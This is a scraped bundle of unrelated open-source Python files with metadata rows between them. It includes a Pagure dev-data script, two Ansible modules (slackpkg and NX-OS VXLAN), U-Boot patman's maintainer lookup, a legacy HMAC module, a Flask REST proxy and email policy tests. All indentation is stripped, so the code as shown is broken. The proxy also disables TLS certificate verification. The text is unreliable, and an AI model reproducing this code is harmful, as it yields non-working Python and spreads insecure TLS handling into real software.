shutil.rmtree(os.path.join(_config['TICKETS_FOLDER'],
fork_proj_location))
except:
print('tickets folder already deleted')
try:
shutil.rmtree(os.path.join(_config['REQUESTS_FOLDER'],
fork_proj_location))
except:
print('requests folder already deleted')
repo = pagure.lib.query.get_authorized_project(session, 'test')
result = pagure.lib.query.fork_project(session, 'foo', repo)
if result == 'Repo "test" cloned to "foo/test"':
session.commit()
def add_content_git_repo(folder, branch='master'):
""" Create some content for the specified git repo. """
if not os.path.exists(folder):
os.makedirs(folder)
brepo = pygit2.init_repository(folder, bare=True)
newfolder = tempfile.mkdtemp(prefix='pagure-tests')
repo = pygit2.clone_repository(folder, newfolder)
# Create a file in that git repo
with open(os.path.join(newfolder, 'sources'), 'w') as stream:
stream.write('foo\n bar')
repo.index.add('sources')
repo.index.write()
parents = []
commit = None
try:
commit = repo.revparse_single(
'HEAD' if branch == 'master' else branch)
except KeyError:
pass
if commit:
parents = [commit.oid.hex]
# Commits the files added
tree = repo.index.write_tree()
author = pygit2.Signature(
'Alice Author', '[email protected]')
committer = pygit2.Signature(
'Cecil Committer', '[email protected]')
repo.create_commit(
'refs/heads/%s' % branch, # the name of the reference to update
author,
committer,
'Add sources file for testing',
# binary string representing the tree object ID
tree,
# list of binary strings representing parents of the new commit
parents,
)
parents = []
commit = None
try:
commit = repo.revparse_single(
'HEAD' if branch == 'master' else branch)
except KeyError:
pass
if commit:
parents = [commit.oid.hex]
subfolder = os.path.join('folder1', 'folder2')
if not os.path.exists(os.path.join(newfolder, subfolder)):
os.makedirs(os.path.join(newfolder, subfolder))
# Create a file in that git repo
with open(os.path.join(newfolder, subfolder, 'file'), 'w') as stream:
stream.write('foo\n bar\nbaz')
repo.index.add(os.path.join(subfolder, 'file'))
repo.index.write()
# Commits the files added
tree = repo.index.write_tree()
author = pygit2.Signature(
'Alice Author', '[email protected]')
committer = pygit2.Signature(
'Cecil Committer', '[email protected]')
repo.create_commit(
'refs/heads/%s' % branch, # the name of the reference to update
author,
committer,
'Add some directory and a file for more testing',
# binary string representing the tree object ID
tree,
# list of binary strings representing parents of the new commit
parents
)
# Push to origin
ori_remote = repo.remotes[0]
master_ref = repo.lookup_reference(
'HEAD' if branch == 'master' else 'refs/heads/%s' % branch).resolve()
refname = '%s:%s' % (master_ref.name, master_ref.name)
PagureRepo.push(ori_remote, refname)
shutil.rmtree(newfolder)
def _get_username():
invalid_option = ['pingou', 'foo']
user_name = os.environ.get("USER_NAME")
if not user_name:
print("")
user_name = six.moves.input(
"Enter your username so we can add you into the test data: ")
cnt = 0
while not user_name.strip() or user_name in invalid_option:
print("Reserved names: " + str(invalid_option))
user_name = six.moves.input(
"Enter your username so we can add you into the "
"test data: ")
cnt += 1
if cnt == 4:
print("We asked too many times, bailing")
sys.exit(1)
return user_name
def _get_user_email():
invalid_option = ['[email protected]', '[email protected]']
user_email = os.environ.get("USER_EMAIL")
if not user_email:
print("")
user_email = six.moves.input("Enter your user email: ")
cnt = 0
while not user_email.strip() or user_email in invalid_option:
print("Reserved names: " + str(invalid_option))
user_email = six.moves.input("Enter your user email: ")
cnt += 1
if cnt == 4:
print("We asked too many times, bailing")
sys.exit(1)
return user_email
if __name__ == "__main__":
desc = "Run the dev database initialization/insertion/deletion " \
"script for db located " + str(_config['DB_URL'])
parser = argparse.ArgumentParser(prog="dev-data", description=desc)
parser.add_argument('-i', '--init', action="store_true",
help="Create the dev db")
parser.add_argument('-p', '--populate', action="store_true",
help="Add test data to the db")
parser.add_argument('-d', '--delete', action="store_true",
help="Wipe the dev db")
parser.add_argument('-a', '--all', action="store_true",
help="Create, Populate then Wipe the dev db")
args = parser.parse_args()
# forcing the user to choose
if not any(vars(args).values()):
parser.error('No arguments provided.')
session = None
if args.init or args.all:
session = pagure.lib.model.create_tables(
db_url=_config["DB_URL"],
alembic_ini=None,
acls=_config["ACLS"],
debug=False)
print("Database created")
if args.populate or args.all:
if not session:
session = pagure.lib.query.create_session(_config['DB_URL'])
user_name = _get_username()
user_email = _get_user_email()
insert_data(session, user_name, user_email)
if args.delete or args.all:
empty_dev_db(session)
| gpl-2.0 | -3,777,202,079,627,342,000 | 29.246217 | 90 | 0.576743 | false |
simonwydooghe/ansible | lib/ansible/modules/packaging/os/slackpkg.py | 95 | 6148 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Kim Nรธrgaard
# Written by Kim Nรธrgaard <[email protected]>
# Based on pkgng module written by bleader <[email protected]>
# that was based on pkgin module written by Shaun Zinck <shaun.zinck at gmail.com>
# that was based on pacman module written by Afterburn <https://github.com/afterburn>
# that was based on apt module written by Matthew Williams <[email protected]>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: slackpkg
short_description: Package manager for Slackware >= 12.2
description:
- Manage binary packages for Slackware using 'slackpkg' which
is available in versions after 12.2.
version_added: "2.0"
options:
name:
description:
- name of package to install/remove
required: true
state:
description:
- state of the package, you can use "installed" as an alias for C(present) and removed as one for C(absent).
choices: [ 'present', 'absent', 'latest' ]
required: false
default: present
update_cache:
description:
- update the package database first
required: false
default: false
type: bool
author: Kim Nรธrgaard (@KimNorgaard)
requirements: [ "Slackware >= 12.2" ]
'''
EXAMPLES = '''
# Install package foo
- slackpkg:
name: foo
state: present
# Remove packages foo and bar
- slackpkg:
name: foo,bar
state: absent
# Make sure that it is the most updated package
- slackpkg:
name: foo
state: latest
'''
from ansible.module_utils.basic import AnsibleModule
def query_package(module, slackpkg_path, name):
import glob
import platform
machine = platform.machine()
packages = glob.glob("/var/log/packages/%s-*-[%s|noarch]*" % (name,
machine))
if len(packages) > 0:
return True
return False
def remove_packages(module, slackpkg_path, packages):
remove_c = 0
# Using a for loop in case of error, we can report the package that failed
for package in packages:
# Query the package first, to see if we even need to remove
if not query_package(module, slackpkg_path, package):
continue
if not module.check_mode:
rc, out, err = module.run_command("%s -default_answer=y -batch=on \
remove %s" % (slackpkg_path,
package))
if not module.check_mode and query_package(module, slackpkg_path,
package):
module.fail_json(msg="failed to remove %s: %s" % (package, out))
remove_c += 1
if remove_c > 0:
module.exit_json(changed=True, msg="removed %s package(s)" % remove_c)
module.exit_json(changed=False, msg="package(s) already absent")
def install_packages(module, slackpkg_path, packages):
install_c = 0
for package in packages:
if query_package(module, slackpkg_path, package):
continue
if not module.check_mode:
rc, out, err = module.run_command("%s -default_answer=y -batch=on \
install %s" % (slackpkg_path,
package))
if not module.check_mode and not query_package(module, slackpkg_path,
package):
module.fail_json(msg="failed to install %s: %s" % (package, out),
stderr=err)
install_c += 1
if install_c > 0:
module.exit_json(changed=True, msg="present %s package(s)"
% (install_c))
module.exit_json(changed=False, msg="package(s) already present")
def upgrade_packages(module, slackpkg_path, packages):
install_c = 0
for package in packages:
if not module.check_mode:
rc, out, err = module.run_command("%s -default_answer=y -batch=on \
upgrade %s" % (slackpkg_path,
package))
if not module.check_mode and not query_package(module, slackpkg_path,
package):
module.fail_json(msg="failed to install %s: %s" % (package, out),
stderr=err)
install_c += 1
if install_c > 0:
module.exit_json(changed=True, msg="present %s package(s)"
% (install_c))
module.exit_json(changed=False, msg="package(s) already present")
def update_cache(module, slackpkg_path):
rc, out, err = module.run_command("%s -batch=on update" % (slackpkg_path))
if rc != 0:
module.fail_json(msg="Could not update package cache")
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(default="installed", choices=['installed', 'removed', 'absent', 'present', 'latest']),
name=dict(aliases=["pkg"], required=True, type='list'),
update_cache=dict(default=False, aliases=["update-cache"],
type='bool'),
),
supports_check_mode=True)
slackpkg_path = module.get_bin_path('slackpkg', True)
p = module.params
pkgs = p['name']
if p["update_cache"]:
update_cache(module, slackpkg_path)
if p['state'] == 'latest':
upgrade_packages(module, slackpkg_path, pkgs)
elif p['state'] in ['present', 'installed']:
install_packages(module, slackpkg_path, pkgs)
elif p["state"] in ['removed', 'absent']:
remove_packages(module, slackpkg_path, pkgs)
if __name__ == '__main__':
main()
| gpl-3.0 | -5,681,596,031,009,584,000 | 29.420792 | 120 | 0.563222 | false |
simonwydooghe/ansible | lib/ansible/modules/network/nxos/nxos_vxlan_vtep_vni.py | 8 | 14044 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_vxlan_vtep_vni
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Creates a Virtual Network Identifier member (VNI)
description:
- Creates a Virtual Network Identifier member (VNI) for an NVE
overlay interface.
author: Gabriele Gerbino (@GGabriele)
notes:
- Tested against NXOSv 7.3.(0)D1(1) on VIRL
- default, where supported, restores params default value.
options:
interface:
description:
- Interface name for the VXLAN Network Virtualization Endpoint.
required: true
vni:
description:
- ID of the Virtual Network Identifier.
required: true
assoc_vrf:
description:
- This attribute is used to identify and separate processing VNIs
that are associated with a VRF and used for routing. The VRF
and VNI specified with this command must match the configuration
of the VNI under the VRF.
type: bool
ingress_replication:
description:
- Specifies mechanism for host reachability advertisement.
choices: ['bgp','static', 'default']
multicast_group:
description:
- The multicast group (range) of the VNI. Valid values are
string and keyword 'default'.
peer_list:
description:
- Set the ingress-replication static peer list. Valid values
are an array, a space-separated string of ip addresses,
or the keyword 'default'.
suppress_arp:
description:
- Suppress arp under layer 2 VNI.
type: bool
suppress_arp_disable:
description:
- Overrides the global ARP suppression config.
This is available on NX-OS 9K series running 9.2.x or higher.
type: bool
version_added: "2.8"
state:
description:
- Determines whether the config should be present or not
on the device.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- nxos_vxlan_vtep_vni:
interface: nve1
vni: 6000
ingress_replication: default
'''
RETURN = '''
commands:
description: commands sent to the device
returned: always
type: list
sample: ["interface nve1", "member vni 6000"]
'''
import re
from ansible.module_utils.network.nxos.nxos import get_config, load_config
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.config import CustomNetworkConfig
BOOL_PARAMS = [
'assoc_vrf',
'suppress_arp',
'suppress_arp_disable',
]
PARAM_TO_DEFAULT_KEYMAP = {
'multicast_group': '',
'peer_list': [],
'ingress_replication': '',
}
PARAM_TO_COMMAND_KEYMAP = {
'assoc_vrf': 'associate-vrf',
'interface': 'interface',
'vni': 'member vni',
'ingress_replication': 'ingress-replication protocol',
'multicast_group': 'mcast-group',
'peer_list': 'peer-ip',
'suppress_arp': 'suppress-arp',
'suppress_arp_disable': 'suppress-arp disable',
}
def get_value(arg, config, module):
command = PARAM_TO_COMMAND_KEYMAP[arg]
command_val_re = re.compile(r'(?:{0}\s)(?P<value>.*)$'.format(command), re.M)
if arg in BOOL_PARAMS:
command_re = re.compile(r'\s+{0}\s*$'.format(command), re.M)
value = False
if command_re.search(config):
value = True
elif arg == 'peer_list':
has_command_val = command_val_re.findall(config, re.M)
value = []
if has_command_val:
value = has_command_val
else:
value = ''
has_command_val = command_val_re.search(config, re.M)
if has_command_val:
value = has_command_val.group('value')
return value
def check_interface(module, netcfg):
config = str(netcfg)
has_interface = re.search(r'(?:interface nve)(?P<value>.*)$', config, re.M)
value = ''
if has_interface:
value = 'nve{0}'.format(has_interface.group('value'))
return value
def get_existing(module, args):
existing = {}
netcfg = CustomNetworkConfig(indent=2, contents=get_config(module))
interface_exist = check_interface(module, netcfg)
if interface_exist:
parents = ['interface {0}'.format(interface_exist)]
temp_config = netcfg.get_section(parents)
if 'member vni {0} associate-vrf'.format(module.params['vni']) in temp_config:
parents.append('member vni {0} associate-vrf'.format(module.params['vni']))
config = netcfg.get_section(parents)
elif "member vni {0}".format(module.params['vni']) in temp_config:
parents.append('member vni {0}'.format(module.params['vni']))
config = netcfg.get_section(parents)
else:
config = {}
if config:
for arg in args:
if arg not in ['interface', 'vni']:
existing[arg] = get_value(arg, config, module)
existing['interface'] = interface_exist
existing['vni'] = module.params['vni']
return existing, interface_exist
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
new_dict[new_key] = value
return new_dict
def state_present(module, existing, proposed, candidate):
commands = list()
proposed_commands = apply_key_map(PARAM_TO_COMMAND_KEYMAP, proposed)
existing_commands = apply_key_map(PARAM_TO_COMMAND_KEYMAP, existing)
for key, value in proposed_commands.items():
if key == 'associate-vrf':
command = 'member vni {0} {1}'.format(module.params['vni'], key)
if not value:
command = 'no {0}'.format(command)
commands.append(command)
elif key == 'peer-ip' and value != []:
for peer in value:
commands.append('{0} {1}'.format(key, peer))
elif key == 'mcast-group' and value != existing_commands.get(key):
commands.append('no {0}'.format(key))
vni_command = 'member vni {0}'.format(module.params['vni'])
if vni_command not in commands:
commands.append('member vni {0}'.format(module.params['vni']))
if value != PARAM_TO_DEFAULT_KEYMAP.get('multicast_group', 'default'):
commands.append('{0} {1}'.format(key, value))
elif key == 'ingress-replication protocol' and value != existing_commands.get(key):
evalue = existing_commands.get(key)
dvalue = PARAM_TO_DEFAULT_KEYMAP.get('ingress_replication', 'default')
if value != dvalue:
if evalue and evalue != dvalue:
commands.append('no {0} {1}'.format(key, evalue))
commands.append('{0} {1}'.format(key, value))
else:
if evalue:
commands.append('no {0} {1}'.format(key, evalue))
elif value is True:
commands.append(key)
elif value is False:
commands.append('no {0}'.format(key))
elif value == 'default' or value == []:
if existing_commands.get(key):
existing_value = existing_commands.get(key)
if key == 'peer-ip':
for peer in existing_value:
commands.append('no {0} {1}'.format(key, peer))
else:
commands.append('no {0} {1}'.format(key, existing_value))
else:
if key.replace(' ', '_').replace('-', '_') in BOOL_PARAMS:
commands.append('no {0}'.format(key.lower()))
else:
command = '{0} {1}'.format(key, value.lower())
commands.append(command)
if commands:
vni_command = 'member vni {0}'.format(module.params['vni'])
ingress_replications_command = 'ingress-replication protocol static'
ingress_replicationb_command = 'ingress-replication protocol bgp'
ingress_replicationns_command = 'no ingress-replication protocol static'
ingress_replicationnb_command = 'no ingress-replication protocol bgp'
interface_command = 'interface {0}'.format(module.params['interface'])
if any(c in commands for c in (ingress_replications_command, ingress_replicationb_command,
ingress_replicationnb_command, ingress_replicationns_command)):
static_level_cmds = [cmd for cmd in commands if 'peer' in cmd]
parents = [interface_command, vni_command]
commands = [cmd for cmd in commands if 'peer' not in cmd]
for cmd in commands:
parents.append(cmd)
candidate.add(static_level_cmds, parents=parents)
elif 'peer-ip' in commands[0]:
static_level_cmds = [cmd for cmd in commands]
parents = [interface_command, vni_command, ingress_replications_command]
candidate.add(static_level_cmds, parents=parents)
if vni_command in commands:
parents = [interface_command]
commands.remove(vni_command)
if module.params['assoc_vrf'] is None:
parents.append(vni_command)
candidate.add(commands, parents=parents)
def state_absent(module, existing, proposed, candidate):
if existing['assoc_vrf']:
commands = ['no member vni {0} associate-vrf'.format(
module.params['vni'])]
else:
commands = ['no member vni {0}'.format(module.params['vni'])]
parents = ['interface {0}'.format(module.params['interface'])]
candidate.add(commands, parents=parents)
def main():
argument_spec = dict(
interface=dict(required=True, type='str'),
vni=dict(required=True, type='str'),
assoc_vrf=dict(required=False, type='bool'),
multicast_group=dict(required=False, type='str'),
peer_list=dict(required=False, type='list'),
suppress_arp=dict(required=False, type='bool'),
suppress_arp_disable=dict(required=False, type='bool'),
ingress_replication=dict(required=False, type='str', choices=['bgp', 'static', 'default']),
state=dict(choices=['present', 'absent'], default='present', required=False),
)
argument_spec.update(nxos_argument_spec)
mutually_exclusive = [('suppress_arp', 'suppress_arp_disable'),
('assoc_vrf', 'multicast_group'),
('assoc_vrf', 'suppress_arp'),
('assoc_vrf', 'suppress_arp_disable'),
('assoc_vrf', 'ingress_replication')]
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True,
)
warnings = list()
result = {'changed': False, 'commands': [], 'warnings': warnings}
if module.params['peer_list']:
if module.params['peer_list'][0] != 'default' and module.params['ingress_replication'] != 'static':
module.fail_json(msg='ingress_replication=static is required '
'when using peer_list param')
else:
peer_list = module.params['peer_list']
if peer_list[0] == 'default':
module.params['peer_list'] = 'default'
else:
stripped_peer_list = list(map(str.strip, peer_list))
module.params['peer_list'] = stripped_peer_list
state = module.params['state']
args = PARAM_TO_COMMAND_KEYMAP.keys()
existing, interface_exist = get_existing(module, args)
if state == 'present':
if not interface_exist:
module.fail_json(msg="The proposed NVE interface does not exist. Use nxos_interface to create it first.")
elif interface_exist != module.params['interface']:
module.fail_json(msg='Only 1 NVE interface is allowed on the switch.')
elif state == 'absent':
if interface_exist != module.params['interface']:
module.exit_json(**result)
elif existing and existing['vni'] != module.params['vni']:
module.fail_json(
msg="ERROR: VNI delete failed: Could not find vni node for {0}".format(module.params['vni']),
existing_vni=existing['vni']
)
proposed_args = dict((k, v) for k, v in module.params.items()
if v is not None and k in args)
proposed = {}
for key, value in proposed_args.items():
if key in ['multicast_group', 'peer_list', 'ingress_replication']:
if str(value).lower() == 'default':
value = PARAM_TO_DEFAULT_KEYMAP.get(key, 'default')
if key != 'interface' and existing.get(key) != value:
proposed[key] = value
candidate = CustomNetworkConfig(indent=3)
if state == 'present':
state_present(module, existing, proposed, candidate)
elif existing and state == 'absent':
state_absent(module, existing, proposed, candidate)
if candidate:
candidate = candidate.items_text()
result['changed'] = True
result['commands'] = candidate
if not module.check_mode:
load_config(module, candidate)
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | 9,016,904,786,302,628,000 | 36.251989 | 117 | 0.609584 | false |
chris4795/u-boot-novena | tools/patman/get_maintainer.py | 8 | 1239 | # Copyright (c) 2012 The Chromium OS Authors.
#
# SPDX-License-Identifier: GPL-2.0+
#
import command
import gitutil
import os
def FindGetMaintainer():
"""Look for the get_maintainer.pl script.
Returns:
If the script is found we'll return a path to it; else None.
"""
try_list = [
os.path.join(gitutil.GetTopLevel(), 'scripts'),
]
# Look in the list
for path in try_list:
fname = os.path.join(path, 'get_maintainer.pl')
if os.path.isfile(fname):
return fname
return None
def GetMaintainer(fname, verbose=False):
"""Run get_maintainer.pl on a file if we find it.
We look for get_maintainer.pl in the 'scripts' directory at the top of
git. If we find it we'll run it. If we don't find get_maintainer.pl
then we fail silently.
Args:
fname: Path to the patch file to run get_maintainer.pl on.
Returns:
A list of email addresses to CC to.
"""
get_maintainer = FindGetMaintainer()
if not get_maintainer:
if verbose:
print("WARNING: Couldn't find get_maintainer.pl")
return []
stdout = command.Output(get_maintainer, '--norolestats', fname)
return stdout.splitlines()
| gpl-2.0 | 945,822,971,134,745,600 | 25.361702 | 74 | 0.634383 | false |
sanjuro/RCJK | vendor/gdata/Crypto/Hash/HMAC.py | 226 | 3330 | """HMAC (Keyed-Hashing for Message Authentication) Python module.
Implements the HMAC algorithm as described by RFC 2104.
This is just a copy of the Python 2.2 HMAC module, modified to work when
used on versions of Python before 2.2.
"""
__revision__ = "$Id: HMAC.py,v 1.5 2002/07/25 17:19:02 z3p Exp $"
import string
def _strxor(s1, s2):
"""Utility method. XOR the two strings s1 and s2 (must have same length).
"""
return "".join(map(lambda x, y: chr(ord(x) ^ ord(y)), s1, s2))
# The size of the digests returned by HMAC depends on the underlying
# hashing module used.
digest_size = None
class HMAC:
"""RFC2104 HMAC class.
This supports the API for Cryptographic Hash Functions (PEP 247).
"""
def __init__(self, key, msg = None, digestmod = None):
"""Create a new HMAC object.
key: key for the keyed hash object.
msg: Initial input for the hash, if provided.
digestmod: A module supporting PEP 247. Defaults to the md5 module.
"""
if digestmod == None:
import md5
digestmod = md5
self.digestmod = digestmod
self.outer = digestmod.new()
self.inner = digestmod.new()
try:
self.digest_size = digestmod.digest_size
except AttributeError:
self.digest_size = len(self.outer.digest())
blocksize = 64
ipad = "\x36" * blocksize
opad = "\x5C" * blocksize
if len(key) > blocksize:
key = digestmod.new(key).digest()
key = key + chr(0) * (blocksize - len(key))
self.outer.update(_strxor(key, opad))
self.inner.update(_strxor(key, ipad))
if (msg):
self.update(msg)
## def clear(self):
## raise NotImplementedError, "clear() method not available in HMAC."
def update(self, msg):
"""Update this hashing object with the string msg.
"""
self.inner.update(msg)
def copy(self):
"""Return a separate copy of this hashing object.
An update to this copy won't affect the original object.
"""
other = HMAC("")
other.digestmod = self.digestmod
other.inner = self.inner.copy()
other.outer = self.outer.copy()
return other
def digest(self):
"""Return the hash value of this hashing object.
This returns a string containing 8-bit data. The object is
not altered in any way by this function; you can continue
updating the object after calling this function.
"""
h = self.outer.copy()
h.update(self.inner.digest())
return h.digest()
def hexdigest(self):
"""Like digest(), but returns a string of hexadecimal digits instead.
"""
return "".join([string.zfill(hex(ord(x))[2:], 2)
for x in tuple(self.digest())])
def new(key, msg = None, digestmod = None):
"""Create a new hashing object and return it.
key: The starting key for the hash.
msg: if available, will immediately be hashed into the object's starting
state.
You can now feed arbitrary strings into the object using its update()
method, and can ask for the hash value at any time by calling its digest()
method.
"""
return HMAC(key, msg, digestmod)
| apache-2.0 | 1,505,576,636,388,951,300 | 29.833333 | 78 | 0.606306 | false |
wayetender/whip | whip/src/adapter/frontends/rest.py | 1 | 3325 | from . import ProxyTerminus
from flask import Flask
from flask import request
from flask import make_response
import urllib2
import socket
import json
import threading
import datetime
import ssl
import logging
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
network_times = open('times', 'w')
network_times.truncate()
class RestProxyTerminus(ProxyTerminus):
def __init__(self, ip, port):
self.actual_ip = ip
self.actual_port = port
def serve_requests(self, client_proxy, endpoint = None):
'''returns: endpoint it is listening on'''
context = ('server.pem', 'server.pem')
if not endpoint:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
port = sock.getsockname()[1]
sock.close()
host = '0.0.0.0'
else:
host = endpoint[0]
port = endpoint[1]
self.app = Flask(__name__)
def handle(p):
try:
arg = {
'args': dict(request.args.items()),
'headers': dict(request.headers.items())
}
result = client_proxy.on_unproxied_request('/%s' % p, [arg])
resp = make_response(json.dumps(result['body']))
for (header, v) in result['headers'].items():
if header == 'content-length': continue
resp.headers[header] = v
return resp
except:
import sys, traceback
print traceback.print_exc(file=sys.stdout)
print sys.exc_info()
self.app.add_url_rule("/<path:p>", 'handle', handle)
self.app.config['PROPAGATE_EXCEPTIONS'] =True
t = threading.Thread(target=lambda: self.app.run(host=host, port=port, ssl_context=context, threaded=True, debug=False, ))
t.setDaemon(True)
t.start()
return ('127.0.0.1', port)
def execute_request(self, callsite):
h = callsite.args[0]['headers']['Host']
apath = 'https://%s:%s%s' % (h, self.actual_port, callsite.opname) if ':' not in h else "https://%s%s" % (h, callsite.opname)
context = ssl._create_unverified_context()
nrequest = urllib2.Request(apath)
for (header, v) in callsite.args[0]['headers'].items():
if header == 'Content-Length' or header == 'Accept-Encoding': continue
nrequest.add_header(header, v)
startTime = datetime.datetime.now()
proxy_resp = urllib2.urlopen(nrequest, context=context)
body = str(proxy_resp.read()).encode('ascii', 'ignore')
code = proxy_resp.getcode()
tempTime = (datetime.datetime.now() - startTime).total_seconds() * 1000
network_times.write("%s\n" % tempTime)
network_times.flush()
res = {
'headers': dict(proxy_resp.info()),
'body': json.loads(body),
'code': code
}
return res
def generate(config, terminal, serviceconfig):
if 'mapsto' not in serviceconfig:
raise ValueError("mapstoservice must be set")
(ip, port) = serviceconfig['actual']
frompath = serviceconfig.get('fromhttppath', None)
return RestProxyTerminus(ip, port)
| gpl-2.0 | 5,410,570,434,407,805,000 | 34 | 133 | 0.571128 | false |
Zhongqilong/kbengine | kbe/res/scripts/common/Lib/test/test_email/test_policy.py | 79 | 13417 | import io
import types
import textwrap
import unittest
import email.policy
import email.parser
import email.generator
from email import headerregistry
def make_defaults(base_defaults, differences):
defaults = base_defaults.copy()
defaults.update(differences)
return defaults
class PolicyAPITests(unittest.TestCase):
longMessage = True
# Base default values.
compat32_defaults = {
'max_line_length': 78,
'linesep': '\n',
'cte_type': '8bit',
'raise_on_defect': False,
}
# These default values are the ones set on email.policy.default.
# If any of these defaults change, the docs must be updated.
policy_defaults = compat32_defaults.copy()
policy_defaults.update({
'raise_on_defect': False,
'header_factory': email.policy.EmailPolicy.header_factory,
'refold_source': 'long',
'content_manager': email.policy.EmailPolicy.content_manager,
})
# For each policy under test, we give here what we expect the defaults to
# be for that policy. The second argument to make defaults is the
# difference between the base defaults and that for the particular policy.
new_policy = email.policy.EmailPolicy()
policies = {
email.policy.compat32: make_defaults(compat32_defaults, {}),
email.policy.default: make_defaults(policy_defaults, {}),
email.policy.SMTP: make_defaults(policy_defaults,
{'linesep': '\r\n'}),
email.policy.HTTP: make_defaults(policy_defaults,
{'linesep': '\r\n',
'max_line_length': None}),
email.policy.strict: make_defaults(policy_defaults,
{'raise_on_defect': True}),
new_policy: make_defaults(policy_defaults, {}),
}
# Creating a new policy creates a new header factory. There is a test
# later that proves this.
policies[new_policy]['header_factory'] = new_policy.header_factory
def test_defaults(self):
for policy, expected in self.policies.items():
for attr, value in expected.items():
self.assertEqual(getattr(policy, attr), value,
("change {} docs/docstrings if defaults have "
"changed").format(policy))
def test_all_attributes_covered(self):
for policy, expected in self.policies.items():
for attr in dir(policy):
if (attr.startswith('_') or
isinstance(getattr(email.policy.EmailPolicy, attr),
types.FunctionType)):
continue
else:
self.assertIn(attr, expected,
"{} is not fully tested".format(attr))
def test_abc(self):
with self.assertRaises(TypeError) as cm:
email.policy.Policy()
msg = str(cm.exception)
abstract_methods = ('fold',
'fold_binary',
'header_fetch_parse',
'header_source_parse',
'header_store_parse')
for method in abstract_methods:
self.assertIn(method, msg)
def test_policy_is_immutable(self):
for policy, defaults in self.policies.items():
for attr in defaults:
with self.assertRaisesRegex(AttributeError, attr+".*read-only"):
setattr(policy, attr, None)
with self.assertRaisesRegex(AttributeError, 'no attribute.*foo'):
policy.foo = None
def test_set_policy_attrs_when_cloned(self):
# None of the attributes has a default value of None, so we set them
# all to None in the clone call and check that it worked.
for policyclass, defaults in self.policies.items():
testattrdict = {attr: None for attr in defaults}
policy = policyclass.clone(**testattrdict)
for attr in defaults:
self.assertIsNone(getattr(policy, attr))
def test_reject_non_policy_keyword_when_called(self):
for policyclass in self.policies:
with self.assertRaises(TypeError):
policyclass(this_keyword_should_not_be_valid=None)
with self.assertRaises(TypeError):
policyclass(newtline=None)
def test_policy_addition(self):
expected = self.policy_defaults.copy()
p1 = email.policy.default.clone(max_line_length=100)
p2 = email.policy.default.clone(max_line_length=50)
added = p1 + p2
expected.update(max_line_length=50)
for attr, value in expected.items():
self.assertEqual(getattr(added, attr), value)
added = p2 + p1
expected.update(max_line_length=100)
for attr, value in expected.items():
self.assertEqual(getattr(added, attr), value)
added = added + email.policy.default
for attr, value in expected.items():
self.assertEqual(getattr(added, attr), value)
def test_register_defect(self):
class Dummy:
def __init__(self):
self.defects = []
obj = Dummy()
defect = object()
policy = email.policy.EmailPolicy()
policy.register_defect(obj, defect)
self.assertEqual(obj.defects, [defect])
defect2 = object()
policy.register_defect(obj, defect2)
self.assertEqual(obj.defects, [defect, defect2])
class MyObj:
def __init__(self):
self.defects = []
class MyDefect(Exception):
pass
def test_handle_defect_raises_on_strict(self):
foo = self.MyObj()
defect = self.MyDefect("the telly is broken")
with self.assertRaisesRegex(self.MyDefect, "the telly is broken"):
email.policy.strict.handle_defect(foo, defect)
def test_handle_defect_registers_defect(self):
foo = self.MyObj()
defect1 = self.MyDefect("one")
email.policy.default.handle_defect(foo, defect1)
self.assertEqual(foo.defects, [defect1])
defect2 = self.MyDefect("two")
email.policy.default.handle_defect(foo, defect2)
self.assertEqual(foo.defects, [defect1, defect2])
class MyPolicy(email.policy.EmailPolicy):
defects = None
def __init__(self, *args, **kw):
super().__init__(*args, defects=[], **kw)
def register_defect(self, obj, defect):
self.defects.append(defect)
def test_overridden_register_defect_still_raises(self):
foo = self.MyObj()
defect = self.MyDefect("the telly is broken")
with self.assertRaisesRegex(self.MyDefect, "the telly is broken"):
self.MyPolicy(raise_on_defect=True).handle_defect(foo, defect)
def test_overriden_register_defect_works(self):
foo = self.MyObj()
defect1 = self.MyDefect("one")
my_policy = self.MyPolicy()
my_policy.handle_defect(foo, defect1)
self.assertEqual(my_policy.defects, [defect1])
self.assertEqual(foo.defects, [])
defect2 = self.MyDefect("two")
my_policy.handle_defect(foo, defect2)
self.assertEqual(my_policy.defects, [defect1, defect2])
self.assertEqual(foo.defects, [])
def test_default_header_factory(self):
h = email.policy.default.header_factory('Test', 'test')
self.assertEqual(h.name, 'Test')
self.assertIsInstance(h, headerregistry.UnstructuredHeader)
self.assertIsInstance(h, headerregistry.BaseHeader)
class Foo:
parse = headerregistry.UnstructuredHeader.parse
def test_each_Policy_gets_unique_factory(self):
policy1 = email.policy.EmailPolicy()
policy2 = email.policy.EmailPolicy()
policy1.header_factory.map_to_type('foo', self.Foo)
h = policy1.header_factory('foo', 'test')
self.assertIsInstance(h, self.Foo)
self.assertNotIsInstance(h, headerregistry.UnstructuredHeader)
h = policy2.header_factory('foo', 'test')
self.assertNotIsInstance(h, self.Foo)
self.assertIsInstance(h, headerregistry.UnstructuredHeader)
def test_clone_copies_factory(self):
policy1 = email.policy.EmailPolicy()
